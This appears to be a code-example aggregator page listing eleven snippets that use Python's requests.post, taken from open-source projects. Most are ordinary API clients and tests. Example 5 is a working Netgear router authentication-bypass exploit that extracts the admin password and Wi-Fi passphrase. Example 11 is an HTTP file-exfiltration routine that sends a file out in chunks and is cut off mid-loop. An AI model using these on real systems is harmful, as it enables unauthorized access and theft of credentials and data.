requests.post

Here are the examples of the python api requests.post taken from open source projects. By voting up you can indicate which examples are most useful and appropriate.

182 Examples 7

Example 1

Project: Habitican-Curse Source File: request_manager.py
    def Flush(self):
        DEBUG.Display("Please Wait...")
        Drops = []

        # Difference obtained in user stats due to these operations
        origDict = {'hp': G.user.hp, 'gp': G.user.gp, 'mp': G.user.mp,
                    'exp': G.user.exp, 'lvl': G.user.lvl}
        diffDict = origDict.copy()

        # Habits marked as +
        for i in self.MarkUpQueue:
            URL = GET_TASKS_URL + "/" + i.task.taskID + "/" + "up"
            response = requests.post(URL, headers=self.headers)

            # Need some error handling here
            if response.status_code!=200:
                return

            json = response.json()
            for i in diffDict:
		diffDict[i] = json[i]

            # Check for drops
            tmp_var = json['_tmp']
            if tmp_var.has_key('drop'):
                if tmp_var['drop'].has_key('dialog'):
                    Drops+=[str(tmp_var['drop']['dialog'])]
                elif tmp_var['drop'].has_key('text'):
                    Drops+=[str(tmp_var['drop']['text'])]
                elif tmp_var['drop'].has_key('notes'):
                    Drops+=[str(tmp_var['drop']['notes'])]

        # Habits marked as -
        for i in self.MarkDownQueue:
            URL = GET_TASKS_URL + "/" + i.task.taskID + "/" + "down"
            response = requests.post(URL, headers=self.headers)

            # Need some error handling here
            if response.status_code!=200:
                return

            json = response.json()
            for i in diffDict:
		#diffDict[i] = U.Round(json[i]) - U.Round(origDict[i])
	        diffDict[i] = json[i]

        # Dailies and TODOS marked as completed
        for i in self.MarkQueue:
            if i.task.task_type != "daily" or (not i.task.completed):
                URL = GET_TASKS_URL + "/" + i.task.taskID + "/" + "up"
            else:
                URL = GET_TASKS_URL + "/" + i.task.taskID + "/" + "down"
	    response = requests.post(URL, headers=self.headers)

	    # Need some error handling here
	    if response.status_code!=200:
                return

            if i.task.task_type == "todo":
                G.TODOMenu.Remove(i.task.taskID)
            elif i.task.task_type == "daily":
                i.task.completed ^= True

	    json = response.json()
	    
	    for i in diffDict:
		diffDict[i] = json[i]

	    # Check for drops
	    tmp_var = json['_tmp']
	    if tmp_var.has_key('drop'):
		if tmp_var['drop'].has_key('dialog'):
		    Drops+=[str(tmp_var['drop']['dialog'])]
		elif tmp_var['drop'].has_key('text'):
		    Drops+=[str(tmp_var['drop']['text'])]
		elif tmp_var['drop'].has_key('notes'):
		    Drops+=[str(tmp_var['drop']['notes'])]

        for i in self.DeleteQueue:
            URL = GET_TASKS_URL + "/" + i.task.taskID
            response = requests.delete(URL, headers=self.headers)

            # Need some error handling here
            if response.status_code!=200:
                return

            if i.task.task_type == "habit":
                G.HabitMenu.Remove(i.task.taskID)
            elif i.task.task_type == "daily":
                G.DailyMenu.Remove(i.task.taskID)
            elif i.task.task_type == "todo":
                G.TODOMenu.Remove(i.task.taskID)

        for i in self.EditQueue:
            URL = GET_TASKS_URL + "/" + i.task.taskID
            response = requests.put(URL, headers=self.headers, json=i.task.data)

            # Need some error handling here
            if response.status_code!=200:
                return

        G.screen.Erase()
        G.user.PrintDiff(diffDict)
        G.intf.Init()
	G.user.PrintUserStats()

        # Display Drop Messages
        if Drops:
            G.screen.SaveInRegister(1)
            drop_items = []
            for i in Drops:
                drop_items += [M.SimpleTextItem(i)]

            dropMenu = M.SimpleTextMenu(drop_items, C.SCR_TEXT_AREA_LENGTH)
            dropMenu.SetXY(C.SCR_FIRST_HALF_LENGTH, 5) 
            dropMenu.Display()
            dropMenu.Input()
            G.screen.RestoreRegister(1)

	self.ClearQueues()

Example 2

Project: redwind Source File: twitter.py
def handle_new_or_edit(post, preview, img, in_reply_to,
                       repost_of, like_of):
    if not is_twitter_authorized():
        current_app.logger.warn('current user is not authorized for twitter')
        return

    # check for RT's
    is_retweet = False
    if repost_of:
        repost_match = PERMALINK_RE.match(repost_of)
        if repost_match:
            is_retweet = True
            tweet_id = repost_match.group(2)
            result = requests.post(
                'https://api.twitter.com/1.1/statuses/retweet/{}.json'
                .format(tweet_id),
                auth=get_auth())
            if result.status_code // 2 != 100:
                raise RuntimeError("{}: {}".format(result,
                                                   result.content))
    is_favorite = False
    if like_of:
        like_match = PERMALINK_RE.match(like_of)
        if like_match:
            is_favorite = True
            tweet_id = like_match.group(2)
            result = requests.post(
                'https://api.twitter.com/1.1/favorites/create.json',
                data={'id': tweet_id},
                auth=get_auth())
            if result.status_code // 2 != 100:
                raise RuntimeError("{}: {}".format(
                    result, result.content))
    if not is_retweet and not is_favorite:
        data = {}
        data['status'] = preview

        loc = (post.venue and post.venue.location) or post.location
        if loc:
            data['lat'] = str(loc.get('latitude'))
            data['long'] = str(loc.get('longitude'))

        if in_reply_to:
            reply_match = PERMALINK_RE.match(in_reply_to)
            if reply_match:
                data['in_reply_to_status_id'] = reply_match.group(2)

        current_app.logger.debug('publishing with data %r', json.dumps(data))
        if img:
            tempfile = download_image_to_temp(img)
            result = requests.post(
                'https://api.twitter.com/1.1/statuses/update_with_media.json',
                data=data,
                files={'media[]': open(tempfile, 'rb')},
                auth=get_auth())

        else:
            result = requests.post(
                'https://api.twitter.com/1.1/statuses/update.json',
                data=data, auth=get_auth())

        if result.status_code // 2 != 100:
            raise RuntimeError("status code: {}, headers: {}, body: {}"
                               .format(result.status_code, result.headers,
                                       result.content))

    result_json = result.json()
    current_app.logger.debug("response from twitter {}".format(
        json.dumps(result_json, indent=True)))
    twitter_url = 'https://twitter.com/{}/status/{}'.format(
        result_json.get('user', {}).get('screen_name'),
        result_json.get('id_str'))

    if not is_favorite:
        post.add_syndication_url(twitter_url)
    return twitter_url

Example 3

Project: sondra Source File: test_requests.py
def test_method_returns():
    int_method_url = _url('simple-app/simple-docuements.simple-int-return')
    none_method_url = _url('simple-app/simple-docuements.simple-none-return')
    number_method_url = _url('simple-app/simple-docuements.simple-number-return')
    str_method_url = _url('simple-app/simple-docuements.simple-str-return')
    list_method_url = _url('simple-app/simple-docuements.list-return')
    dict_method_url = _url('simple-app/simple-docuements.dict-return')
    self_method_url = _url('simple-app/simple-docuements.operates-on-self')
    
    int_rsp = requests.post(int_method_url)
    assert int_rsp.ok
    x = int_rsp.json()
    assert isinstance(x, dict)
    assert '_' in x
    assert isinstance(x['_'], int)
    
    none_rsp = requests.post(none_method_url)
    assert none_rsp.ok
    
    number_rsp = requests.post(number_method_url)
    assert number_rsp.ok
    x = number_rsp.json()
    assert isinstance(x, dict)
    assert '_' in x
    assert isinstance(x['_'], float)
    
    str_rsp = requests.post(str_method_url)
    assert str_rsp.ok
    x = str_rsp.json()
    assert isinstance(x, dict)
    assert '_' in x
    assert isinstance(x['_'], str)
    
    dict_rsp = requests.post(dict_method_url)
    assert dict_rsp.ok
    x = dict_rsp.json()
    assert isinstance(x, dict)
    assert '_' not in x
    assert x == {
        'a': 0,
        'b': 1,
        'c': 2
    }

    list_rsp = requests.post(list_method_url)
    assert list_rsp.ok
    x = list_rsp.json()
    assert isinstance(x, list)
    assert x == ["0", "1", "2", "3"]
    
    self_rsp = requests.post(self_method_url)
    assert self_rsp.ok

Example 4

Project: silo.pub Source File: twitter.py
def publish(site):
    auth = OAuth1(
        client_key=current_app.config['TWITTER_CLIENT_KEY'],
        client_secret=current_app.config['TWITTER_CLIENT_SECRET'],
        resource_owner_key=site.account.token,
        resource_owner_secret=site.account.token_secret)

    def interpret_response(result):
        if result.status_code // 100 != 2:
            return util.wrap_silo_error_response(result)

        result_json = result.json()
        twitter_url = 'https://twitter.com/{}/status/{}'.format(
            result_json.get('user', {}).get('screen_name'),
            result_json.get('id_str'))
        return util.make_publish_success_response(twitter_url, result_json)

    def get_tweet_id(original):
        tweet_url = util.posse_post_discovery(original, TWEET_RE)
        if tweet_url:
            m = TWEET_RE.match(tweet_url)
            if m:
                return m.group(1), m.group(2)
        return None, None

    def upload_photo(photo):
        current_app.logger.debug('uploading photo, name=%s, type=%s',
                                 photo.filename, photo.content_type)
        result = requests.post(UPLOAD_MEDIA_URL, files={
            'media': (photo.filename, photo.stream, photo.content_type),
        }, auth=auth)
        if result.status_code // 100 != 2:
            return None, result
        result_data = result.json()
        current_app.logger.debug('upload result: %s', result_data)
        return result_data.get('media_id_string'), None

    def upload_video(video, default_content_type='video/mp4'):
        # chunked video upload
        chunk_files = []

        def cleanup():
            for f in chunk_files:
                os.unlink(f)

        chunk_size = 1 << 20
        total_size = 0
        while True:
            chunk = video.read(chunk_size)
            if not chunk:
                break
            total_size += len(chunk)

            tempfd, tempfn = tempfile.mkstemp('-%03d-%s' % (
                len(chunk_files), video.filename))
            with open(tempfn, 'wb') as f:
                f.write(chunk)
            chunk_files.append(tempfn)

        current_app.logger.debug('init upload. type=%s, length=%s',
                                 video.content_type, video.content_length)
        result = requests.post(UPLOAD_MEDIA_URL, data={
            'command': 'INIT',
            'media_type': video.content_type or default_content_type,
            'total_bytes': total_size,
        }, auth=auth)
        current_app.logger.debug('init result: %s %s', result, result.text)
        if result.status_code // 100 != 2:
            cleanup()
            return None, result
        result_data = result.json()
        media_id = result_data.get('media_id_string')
        segment_idx = 0

        for chunk_file in chunk_files:
            current_app.logger.debug('appending file: %s', chunk_file)
            result = requests.post(UPLOAD_MEDIA_URL, data={
                'command': 'APPEND',
                'media_id': media_id,
                'segment_index': segment_idx,
            }, files={
                'media': open(chunk_file, 'rb'),
            }, auth=auth)
            current_app.logger.debug(
                'append result: %s %s', result, result.text)
            if result.status_code // 100 != 2:
                cleanup()
                return None, result
            segment_idx += 1

        current_app.logger.debug('finalize uploading video: %s', media_id)
        result = requests.post(UPLOAD_MEDIA_URL, data={
            'command': 'FINALIZE',
            'media_id': media_id,
        }, auth=auth)
        current_app.logger.debug('finalize result: %s %s', result, result.text)
        if result.status_code // 100 != 2:
            cleanup()
            return None, result
        cleanup()
        return media_id, None

    data = {}
    format = brevity.FORMAT_NOTE
    content = request.form.get('content[value]') or request.form.get('content')

    if 'name' in request.form:
        format = brevity.FORMAT_ARTICLE
        content = request.form.get('name')

    repost_ofs = util.get_possible_array_value(request.form, 'repost-of')
    for repost_of in repost_ofs:
        _, tweet_id = get_tweet_id(repost_of)
        if tweet_id:
            return interpret_response(
                requests.post(RETWEET_STATUS_URL.format(tweet_id), auth=auth))
    else:
        if repost_ofs:
            content = 'Reposted: {}'.format(repost_ofs[0])

    like_ofs = util.get_possible_array_value(request.form, 'like-of')
    for like_of in like_ofs:
        _, tweet_id = get_tweet_id(like_of)
        if tweet_id:
            return interpret_response(
                requests.post(FAVE_STATUS_URL, data={'id': tweet_id}, auth=auth))
    else:
        if like_ofs:
            content = 'Liked: {}'.format(like_ofs[0])

    media_ids = []
    for photo in util.get_files_or_urls_as_file_storage(request.files, request.form, 'photo'):
        media_id, err = upload_photo(photo)
        if err:
            return util.wrap_silo_error_response(err)
        media_ids.append(media_id)

    for video in util.get_files_or_urls_as_file_storage(request.files, request.form, 'video'):
        media_id, err = upload_video(video)
        if err:
            return util.wrap_silo_error_response(err)
        media_ids.append(media_id)

    in_reply_tos = util.get_possible_array_value(request.form, 'in-reply-to')
    for in_reply_to in in_reply_tos:
        twitterer, tweet_id = get_tweet_id(in_reply_to)
        if tweet_id:
            data['in_reply_to_status_id'] = tweet_id
            if (twitterer != site.account.username and
                    '@' + twitterer.lower() not in content.lower()):
                content = '@{} {}'.format(twitterer, content)
            break
    else:
        if in_reply_tos:
            content = 'Re: {}, {}'.format(in_reply_tos[0], content)

    location = request.form.get('location')
    current_app.logger.debug('received location param: %s', location)
    data['lat'], data['long'] = util.parse_geo_uri(location)

    permalink_url = request.form.get('url')
    if media_ids:
        data['media_ids'] = ','.join(media_ids)

    if content:
        data['status'] = brevity.shorten(content, permalink=permalink_url,
                                         format=format)
    data = util.trim_nulls(data)
    current_app.logger.debug('publishing with params %s', data)
    return interpret_response(
        requests.post(CREATE_STATUS_URL, data=data, auth=auth))

Example 5

Project: rext Source File: wndr_auth_bypass.py
    def do_run(self, e):
        url = "http://%s:%s/" % (self.host, self.port)

        # Headers with SOAP requests
        headers = {"SOAPAction": "urn:NETGEAR-ROUTER:service:DeviceInfo:1#GetInfo"}
        headers1 = {"SOAPAction": "urn:NETGEAR-ROUTER:service:LANConfigSecurity:1#GetInfo"}
        headers2 = {"SOAPAction": "urn:NETGEAR-ROUTER:service:WLANConfiguration:1#GetInfo"}
        headers3 = {"SOAPAction": "urn:NETGEAR-ROUTER:service:WLANConfiguration:1#GetWPASecurityKeys"}
        headers4 = {"SOAPAction": "urn:NETGEAR-ROUTER:service:DeviceInfo:1#GetAttachDevice"}

        payload = {"": ""}  # Empty form will cause that the auth is bypassed

        # This is a very stupid way to parse XML but xml.etree is not playing nice with SOAP and
        # I don't feel like adding lxml into dependencies just for this module
        striptag = re.compile(r'<.*?>')
        try:
            print_yellow("Sending exploit")

            # Request DeviceInfo
            response = requests.post(url, headers=headers, data=payload, timeout=60)
            if response.status_code != 200:
                raise requests.ConnectionError
            print_yellow("Writing response to DeviceInfo.xml")
            core.io.writetextfile(response.text, "DeviceInfo.xml")
            print_yellow("Parsing response")
            regex = re.search("<Description>(.*)", response.text)
            regex2 = re.search("<SerialNumber>(.*)", response.text)
            regex3 = re.search("<Firmwareversion>(.*)", response.text)
            try:
                description = striptag.sub('', regex.group(1))
                serial_number = striptag.sub('', regex2.group(1))
                firmware = striptag.sub('', regex3.group(1))
                print_green("Device: %s" % description)
                print_green("Serial number: %s" % serial_number)
                print_green("FW version: %s" % firmware)
            except IndexError:
                print_error("opps unable to locate this regular expression")

            # Request web UI password
            response = requests.post(url, headers=headers1, data=payload, timeout=60)
            if response.status_code != 200:
                raise requests.ConnectionError
            print_yellow("Writing response to LANConfigSecurity.xml")
            core.io.writetextfile(response.text, "LANConfigSecurity.xml")
            print_yellow("Parsing response")
            regex = re.search("<NewPassword>(.*)", response.text)
            try:
                password = striptag.sub('', regex.group(1))
                print_green("Password: %s" % password)
            except IndexError:
                print_error("opps unable to locate this regular expression")

            # Request WLAN info
            response = requests.post(url, headers=headers2, data=payload, timeout=60)
            if response.status_code != 200:
                raise requests.ConnectionError
            print_yellow("Writing response to WLANConfiguration.xml")
            core.io.writetextfile(response.text, "WLANConfiguration.xml")
            print_yellow("Parsing response")
            regex = re.search("<NewSSID>(.*)", response.text)
            regex2 = re.search("<NewBasicEncryptionModes>(.*)", response.text)
            try:
                ssid = regex.group(1)
                ssid = striptag.sub('', ssid)
                wlan_encryption = striptag.sub('', regex2.group(1))
                print_green("SSID: " + ssid)
                print_green("Encryption: %s" % wlan_encryption)
            except IndexError:
                print_error("opps unable to locate this regular expression")

            # Wlan password
            response = requests.post(url, headers=headers3, data=payload, timeout=60)
            if response.status_code != 200:
                raise requests.ConnectionError
            print_yellow("Writing response to WLANConfigurationGetWPASecurityKeys.xml")
            core.io.writetextfile(response.text, "WLANConfigurationGetWPASecurityKeys.xml")
            print_yellow("Parsing response")
            regex = re.search("<NewWPAPassphrase>(.*)", response.text)
            try:
                wlan_password = striptag.sub('', regex.group(1))
                print_green("Passphrase: %s" % wlan_password)
            except IndexError:
                print_error("opps unable to locate this regular expression")

            # Attached devices
            response = requests.post(url, headers=headers4, data=payload, timeout=60)
            if response.status_code != 200:
                raise requests.ConnectionError
            print_yellow("Writing response to DeviceInfoGetAttachDevice.xml")
            core.io.writetextfile(response.text, "DeviceInfoGetAttachDevice.xml")
            print_yellow("Parsing response")
            regex = re.search("<NewAttachDevice>(.*)", response.text)
            try:
                devices = striptag.sub('', regex.group(1))
                devices = devices.split('@')[1:]  # First element is number of records
                for device in devices:
                    device = device.split(";")
                    print_green("ID: %s" % device[0])
                    print_green("IP: %s" % device[1])
                    print_green("Name: %s" % device[2])
                    print_green("MAC: %s" % interface.utils.lookup_mac(device[3]))
                    print_green("Connection type: %s" % device[4])
            except IndexError:
                print_error("opps unable to locate this regular expression")

        except requests.ConnectionError as e:
            print_error("lost connection " + e)
        except requests.Timeout:
            print_error("timeout")

Example 6

Project: djoauth2 Source File: client_demo.py
def main():
  client_name = 'Example Client'
  client_key = 'be6f31235c6118273918c4c70f6768'
  client_secret = '89dcee4e6fe655377a19944c2bee9b'
  client_redirect_uri = 'http://localhost:1111/'
  client_auth_headers = {
    'Authorization': 'Basic {}'.format(
        b64encode('{}:{}'.format(client_key, client_secret)))
  }

  authorization_endpoint = 'http://localhost:8080/oauth2/authorization/'
  token_endpoint = 'http://localhost:8080/oauth2/token/'
  user_info_endpoint =   'http://localhost:8080/api/user_info/'

  scopes = ['user_info']
  scope_string = ' '.join(scopes)

  auth_url = '{}?scope={}&client_id={}&response_type=code'.format(
      authorization_endpoint,
      scope_string,
      client_key)

  print ''
  print 'Log in via the admin page (username: exampleuser, password: password)'
  print ''
  print 'http://localhost:8080/admin/'
  print ''
  raw_input('press return to continue...')

  print ''
  print 'Open the following URL in your browser:'
  print ''
  print auth_url
  print ''
  print 'Click the "Accept" button to grant this client access to your data. '
  print 'Your browser will be redirected to a URL with a "code" parameter; copy '
  print 'that value and paste it in below.'
  print ''

  auth_code = raw_input('code=').strip()

  # Exchange the authorization code for an access token.
  data = {
    'code': auth_code,
    'grant_type': 'authorization_code',
  }
  token_response = requests.post(
      token_endpoint,
      data=data,
      headers=client_auth_headers)
  assert_200(token_response)

  token_data = json.loads(token_response.content)
  print ''
  print 'Received access token information:'
  print '   access token:', token_data['access_token']
  print '  refresh token:', token_data.get('refresh_token', '')
  print '   lifetime (s):', token_data['expires_in']
  print ''
  raw_input('press return to continue...')


  # Exchange the refresh token for a new access token, if we received one.
  refresh_token = token_data.get('refresh_token')
  if refresh_token:
    data = {
      'refresh_token' : refresh_token,
      'grant_type' : 'refresh_token',
    }
    token_response = requests.post(
        token_endpoint,
        data=data,
        headers=client_auth_headers,
        verify=False)
    assert_200(token_response)
    token_data = json.loads(token_response.content)

    print ''
    print 'Exchanged refresh token for access token:'
    print '   access token:', token_data['access_token']
    print '  refresh token:', token_data.get('refresh_token', '')
    print '   lifetime (s):', token_data['expires_in']
    print ''
    raw_input('press return to continue...')

  # Make a failing PI request, showing what happens when we don't include
  # authorization.

  failing_api_resp = requests.post(
    user_info_endpoint,
    headers={},
    data={},
    verify=False)

  try:
    assert_200(failing_api_resp)
  except ValueError as ve:
    print 'Unauthenticated API request failed as expected:'
    print ''
    print ve

  # Make an API request, authenticating with our recently received access token.
  api_resp = requests.post(
    user_info_endpoint,
    headers={
      'Authorization': 'Bearer {}'.format(token_data['access_token'])
    },
    data={},
    verify=False)

  assert_200(api_resp)

  print ''
  print 'Authenticated API request succeeded! Returned the following content:'
  print api_resp.content
  print ''

Example 7

Project: maltrieve Source File: maltrieve.py
def upload_crits(response, md5, cfg):
    if response:
        url_tag = urlparse(response.url)
        mime_type = magic.from_buffer(response.content, mime=True)
        files = {'filedata': (md5, response.content)}
        headers = {'User-agent': 'Maltrieve'}
        zip_files = ['application/zip', 'application/gzip', 'application/x-7z-compressed']
        rar_files = ['application/x-rar-compressed']
        inserted_domain = False
        inserted_sample = False

        # submit domain / IP
        # TODO: identify if it is a domain or IP and submit accordingly
        url = "{srv}/api/v1/domains/".format(srv=cfg.crits)
        domain_data = {
            'api_key': cfg.crits_key,
            'username': cfg.crits_user,
            'source': cfg.crits_source,
            'domain': url_tag.netloc
        }
        try:
            # Note that this request does NOT go through proxies
            logging.debug("Domain submission: %s|%r", url, domain_data)
            domain_response = requests.post(url, headers=headers, data=domain_data, verify=False)
            # pylint says "Instance of LookupDict has no 'ok' member" but it's wrong, I checked
            if domain_response.status_code == requests.codes.ok:
                domain_response_data = domain_response.json()
                if domain_response_data['return_code'] == 0:
                    inserted_domain = True
                else:
                    logging.info("Submitted domain info %s for %s to CRITs, response was %s",
                                 domain_data['domain'], md5, domain_response_data)
            else:
                logging.info("Submission of %s failed: %d", url, domain_response.status_code)
        except requests.exceptions.ConnectionError:
            logging.info("Could not connect to CRITs when submitting domain %s", domain_data['domain'])
        except requests.exceptions.HTTPError:
            logging.info("HTTP error when submitting domain %s to CRITs", domain_data['domain'])

        # Submit sample
        url = "{srv}/api/v1/samples/".format(srv=cfg.crits)
        if mime_type in zip_files:
            file_type = 'zip'
        elif mime_type in rar_files:
            file_type = 'rar'
        else:
            file_type = 'raw'
        sample_data = {
            'api_key': cfg.crits_key,
            'username': cfg.crits_user,
            'source': cfg.crits_source,
            'upload_type': 'file',
            'md5': md5,
            'file_format': file_type  # must be type zip, rar, or raw
        }
        try:
            # Note that this request does NOT go through proxies
            sample_response = requests.post(url, headers=headers, files=files, data=sample_data, verify=False)
            # pylint says "Instance of LookupDict has no 'ok' member" but it's wrong, I checked
            if sample_response.status_code == requests.codes.ok:
                sample_response_data = sample_response.json()
                if sample_response_data['return_code'] == 0:
                    inserted_sample = True
                else:
                    logging.info("Submitted sample %s to CRITs, response was %r", md5, sample_response_data)
            else:
                logging.info("Submission of sample %s failed: %d}", md5, sample_response.status_code)
        except requests.exceptions.ConnectionError:
            logging.info("Could not connect to CRITs when submitting sample %s", md5)
        except requests.exceptions.HTTPError:
            logging.info("HTTP error when submitting sample %s to CRITs", md5)

        # Create a relationship for the sample and domain
        url = "{srv}/api/v1/relationships/".format(srv=cfg.crits)
        if (inserted_sample and inserted_domain):
            relationship_data = {
                'api_key': cfg.crits_key,
                'username': cfg.crits_user,
                'source': cfg.crits_source,
                'right_type': domain_response_data['type'],
                'right_id': domain_response_data['id'],
                'left_type': sample_response_data['type'],
                'left_id': sample_response_data['id'],
                'rel_type': 'Downloaded_From',
                'rel_confidence': 'high',
                'rel_date': datetime.datetime.now()
            }
            try:
                # Note that this request does NOT go through proxies
                relationship_response = requests.post(url, headers=headers, data=relationship_data, verify=False)
                # pylint says "Instance of LookupDict has no 'ok' member"
                if relationship_response.status_code != requests.codes.ok:
                    logging.info("Submitted relationship info for %s to CRITs, response was %r",
                                 md5, domain_response_data)
            except requests.exceptions.ConnectionError:
                logging.info("Could not connect to CRITs when submitting relationship for sample %s", md5)
            except requests.exceptions.HTTPError:
                logging.info("HTTP error when submitting relationship for sample %s to CRITs", md5)
                return True
        else:
            return False

Example 8

Project: sondra Source File: test_requests.py
def test_docuement_method():
    simple_docuements = _url('simple-app/simple-docuements')
    added_docuement_1 = {
        "name": "Added Docuement 1",
        "date": datetime.utcnow().isoformat(),
    }
    # add an item to the collection
    post = requests.post(simple_docuements, data=json.dumps(added_docuement_1))
    assert post.ok

    test_method_url = _url('simple-app/simple-docuements/added-docuement-1.arg-test')

    schema_url = test_method_url + ';schema'
    schema = requests.get(schema_url)
    assert schema.ok
    schema = schema.json()
    assert isinstance(schema, dict)
    assert 'definitions' in schema
    assert 'method_request' in schema['definitions']
    assert 'method_response' in schema['definitions']
    assert 'id' in schema
    assert schema['id'] == schema_url

    help_url = test_method_url + ';help'
    help = requests.get(help_url)
    assert help.ok
    assert help.text

    args = json.dumps({
        'int_arg': 10,
        'str_arg': "string",
        'list_arg': ['list'],
        'dict_arg': {'key': 'value'}
    })

    json_url = test_method_url + ';json'
    get_noargs = requests.get(json_url)
    get_args = requests.get(json_url, params={'q': args})

    post_noargs = requests.post(json_url)
    post_args = requests.post(json_url, data=args)

    assert get_noargs.ok
    assert get_noargs.json()
    assert get_args.ok
    assert get_args.json()
    assert post_args.ok
    assert post_args.json()
    assert get_args.json() == post_args.json()
    assert get_noargs.json() == post_noargs.json()
    assert post_args.json() == [{"one": 1}, 0, 2]

Example 9

Project: maltego_censys Source File: censys_issuer_cn_to_sha1.py
Function: main
def main():
    mt = MaltegoTransform()
    if len(sys.argv) != 5:
        mt.addException("You appear to be missing your uid and secret. Here is what was in your path: {s}".format(
            s=sys.argv))
        mt.throwExceptions()
    censys_uid = sys.argv[1]
    censys_secret = sys.argv[2]
    cn = sys.argv[3]
    auth = (censys_uid, censys_secret)
    page = 1
    query = {'query': '443.https.tls.certificate.parsed.issuer.common_name.raw: {cn}'.format(cn=cn), 'fields':
             ['443.https.tls.certificate.parsed.fingerprint_sha1', '443.https.tls.certificate.parsed.issuer_dn',
              '443.https.tls.certificate.parsed.subject_dn', 'updated_at', ], 'page': page}
    try:
        request = requests.post('https://www.censys.io/api/v1/search/ipv4', data=json.dumps(query), auth=auth)
        if request.status_code == 200:
            results = request.json()
            pages = results['metadata']['pages']
            if results['metadata']['count'] > 0:
                parse_results(results['results'], mt)
                if pages > 1 > 4:
                    mt.addUIMessage("Found more than one page. Getting up to the first 100 results")
                    for i in range(2, 5):
                        page = i
                        query['page'] = page
                        request = requests.post('https://www.censys.io/api/v1/search/ipv4', data=json.dumps(query),
                                                auth=auth)
                        if request.status_code == 200:
                            results = request.json()
                            if results['metadata']['count'] > 0:
                                parse_results(results['results'], mt)
                        else:
                            if request.status_code == 400:
                                results = request.json()
                                mt.addException(str(results['error']))
                            if request.status_code == 429:
                                results = request.json()
                                mt.addException(str(results['error']))
                            if request.status_code == 404:
                                mt.addException("No data was found for this issuer cn {cn}".format(cn=cn))
                            if request.status_code == 500:
                                mt.addException("There has been a server error!!!")
                if pages < 5 > 1:
                    mt.addUIMessage("Found more than one page. Getting up to the first 100 results")
                    for i in range(2, pages):
                        page = i
                        query['page'] = page
                        request = requests.post('https://www.censys.io/api/v1/search/ipv4', data=json.dumps(query),
                                                auth=auth)
                        if request.status_code == 200:
                            results = request.json()
                            if results['metadata']['count'] > 0:
                                parse_results(results['results'], mt)
                        else:
                            if request.status_code == 400:
                                results = request.json()
                                mt.addException(str(results['error']))
                            if request.status_code == 429:
                                results = request.json()
                                mt.addException(str(results['error']))
                            if request.status_code == 404:
                                mt.addException("No data was found for this issuer cn {cn}".format(cn=cn))
                            if request.status_code == 500:
                                mt.addException("There has been a server error!!!")

            else:
                mt.addUIMessage("No additional cert data was found with this ssl cert subject cn: {cn}".format(cn=cn))
            mt.returnOutput()
        else:
            if request.status_code == 400:
                results = request.json()
                mt.addException(str(results['error']))
            if request.status_code == 429:
                results = request.json()
                mt.addException(str(results['error']))
            if request.status_code == 404:
                mt.addException("No data was found for this issuer cn {cn}".format(cn=cn))
            if request.status_code == 500:
                mt.addException("There has been a server error!!!")
            mt.throwExceptions()

    except requests.exceptions.RequestException as e:
        mt.addException(str(e))
        mt.throwExceptions()

Example 10

Project: ocdev Source File: appstore.py
    def run(self, arguments, directory, settings):
        url = settings.get_value('appstore', 'url').rstrip('/')
        user = settings.get_value('appstore', 'user')
        password = settings.get_value('appstore', 'password')
        archive_dir = arguments.archive
        app_name = basename(archive_dir).split('.')[0]

        # parse the appinfo/info.xml from the archive to fill in stuff required
        # for the release
        archive = tar_open(archive_dir)

        # TODO: we need app validation like:
        # * name of the folder is the same as the id in info.xml
        # * no private api usage
        # * all needed fields for info.xml present
        # * size not bigger than allowed to upload
        info_xml = archive.extractfile(
            dict(zip(
                archive.getnames(),
                archive.getmembers()
            ))['%s/appinfo/info.xml' % app_name]
        )

        parser = InfoParser()
        result = parser.parse(info_xml.read())

        # no ocsid present means not yet in the appstore so let's upload it
        params = {
            'name': result['name'],
            'type': result['category'],
            'depend': result['requiremin'],
            'downloadtype1': 0,
            'licensetype': result['licence'],
            'version': result['version']
        }

        if result['homepage'] != '':
            params['homepage'] = result['homepage']
            params['homepagetype'] = 'Homepage'
        if result['repository'] != '':
            params['homepage2'] = result['repository']
            params['homepagetype2'] = 'Version Control'
        if result['bugs'] != '':
            params['homepage3'] = result['bugs']
            params['homepagetype3'] = 'Issue Tracker'
        if result['requiremax'] != '':
            params['depend2'] = result['requiremax']

        if result['ocsid'] == '':
            create_url = '%s/content/add ' % url
            response = requests.post(create_url, params=params, auth=(user, password))
            code = self.get_status_code(response)

            if code == '102':
                raise Exception('Not authorized! Check your credentials.')

            # get ocsid
            tree = ElementTree.fromstring(response.text)
            ocsid = tree.findtext('.//data/content/id')

            print('Please add <ocsid>%s</ocsid> to your appinfo/info.xml to ' +
                  'be able to update the uploaded app' % ocsid)
        else:
            update_url = '%s/content/edit/%s' % (url, result['ocsid'])
            response = requests.post(update_url, params=params, auth=(user, password))
            code = self.get_status_code(response)

            if code == '102':
                raise Exception('Not authorized! Check your credentials.')

        upload_file_url = '%s/content/uploaddownload/%s' % (url, result['ocsid'])
        file = {'localfile': open(archive_dir, 'rb')}
        response = requests.post(files=file)
        code = self.get_status_code(response)

        if code == '101':
            raise Exception('Could not upload file. Is the archive bigger ' +
                            'than 10Mb?')
        elif code == '103':
            raise Exception('Not authorized! Check your credentials.')

Example 11

Project: PyExfil Source File: http_exfiltration.py
Function: send_file
def send_file(addr, file_path, max_packet_size=1200, time_delay=0.05):
	"""
	This function will exfiltrate the data given.
	:param addr: IP or hostname to exfiltrate the data to
	:param file_path: Path of the file to exfiltrate
	:param max_packet_size: If not set the max size is 1200
	:param time_delay: If not set time delay between packets is 0.05 seconds
	:return:
	"""
	try:
		# Load file
		fh = open(file_path, READ_BINARY)
		iAmFile = fh.read()
		fh.close()
	except:
		sys.stderr.write("Error reading file!\n")
		raise ()

	# Split file to chunks by size:
	chunks = []
	IamDone = ""

	IamDone = base64.b64encode(iAmFile)                                                         # Base64 Encode for ASCII
	checksum = zlib.crc32(IamDone)                                                              # Calculate CRC32 for later verification
	chunks = [IamDone[i:i + max_packet_size] for i in range(0, len(IamDone), max_packet_size)]  # Split into chunks
	head, tail = os.path.split(file_path)                                                       # Get filename

	# Initial packet:
	try:
		init_payload = tail + COOKIE_DELIMITER + str(checksum) + COOKIE_DELIMITER + str(len(chunks))
		payload = {INIT_PACKET_COOKIE: init_payload}
		requests.post(addr, data=json.dumps(payload), headers=HEADERS)
		sys.stdout.write("[+] Sent initiation package. Total of %s chunks.\n" % (len(chunks) + 2))
		sys.stdout.write(".")
		time.sleep(time_delay)
	except:
		sys.stderr.write("Unable to reach target with error:\n")
		raise ()

	# Send data
	current_chunk = 0
	for chunk in chunks:
		payload = {PACKET_COOKIE + str(current_chunk): chunk}
		requests.post(addr, data=json.dumps(payload), headers=HEADERS)
